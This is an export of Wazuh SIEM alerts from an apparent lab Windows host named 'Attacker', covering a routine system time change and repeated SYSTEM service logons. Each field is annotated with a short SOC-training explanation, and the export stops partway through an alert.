agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533927.421691
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4616
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12288
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:56:00.2089499Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43745
Incremental log record number – handy for timeline order.

data.win.system.processID:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  8000
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "The system time was changed. Subject: Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Process Information: Process ID: 0x1c48 Name: C:\Windows\System32\svchost.exe Previous Time: ‎2025‎-‎04‎-‎20T01:56:00.205999700Z New Time: ‎2025‎-‎04‎-‎20T01:56:00.207016100Z This event is generated when the system time is changed. It is normal for the Windows Time Service, which runs with System privilege, to change the system time on a regular basis. Other system time changes may be indicative of attempts to tamper with the computer."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-19
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  LOCAL SERVICE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.previousTime:  2025-04-20T01:56:00.2059997Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.newTime:  2025-04-20T01:56:00.2070161Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  0x1c48
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\svchost.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  5
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:07.416+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:07.416+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  42
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533927.424894
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:31:03.5251845Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43748
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  13300
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:07.494+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:07.494+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  43
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533927.432232
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:31:05.0009011Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43750
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4968
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:07.574+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:07.574+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  44
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533927.439568
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:31:05.8916950Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43752
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  13300
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:07.684+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:07.684+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  45
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533927.446906
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
